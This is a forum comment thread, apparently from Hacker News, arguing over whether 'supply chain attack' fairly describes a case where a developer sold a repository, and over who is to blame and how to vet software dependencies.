The phrase "supply chain attack" makes it sound like it's some big, hard to avoi...

akira2501 · 2024-06-25T22:09:10

It's called a supply chain attack to displace the blame on the profitable organization that negligently uses this code onto the unpaid developers who lost control of it.

As if expecting lone OSS developers that you don't donate any money towards somehow being able to stand up against the attacks of nation states is a rational position to take.

ldoughty · 2024-06-25T21:14:21

In this case, the developer sold the user account & repository for money (no ownership change to monitor).. so if you were not privy to that transaction, you really couldn't "easily" avoid this without e.g. forking every repo you depend on and bringing it in house or some other likely painful defense mechanism to implement

skydhash · 2024-07-01T20:04:05

That’s why businesses pay Redhat, Qt, Unity,… Clear contracts that reduces the risk of compromised dependencies. Or you vet your dependencies (it helps when you don’t have a lot)

cqqxo4zV46cp · 2024-06-25T21:30:30

What good does this comment do beside allow you to gloat and put others down? Like, Christ. Are you telling me that you’d ever speak this way to someone in person?

I have no doubt that every single person in this thread understands what a supply chain attack is.

You are arguing over semantics in an incredibly naive way. Trust relationships exist both in business and in society generally. It’s worth calling out attacks against trust relationships as what they are: attacks.

diego_sandoval · 2024-06-26T05:45:16

All other things being equal, a computer system that doesn't depend on trusting some external entity is better than one that does.

Sometimes, trusting is inevitable (e.g. SSL certificate authorities), but in this case, it was very much a choice on part of the developers.

grodriguez100 · 2024-06-26T07:18:32

I love the ethanol consumption attack thing :-)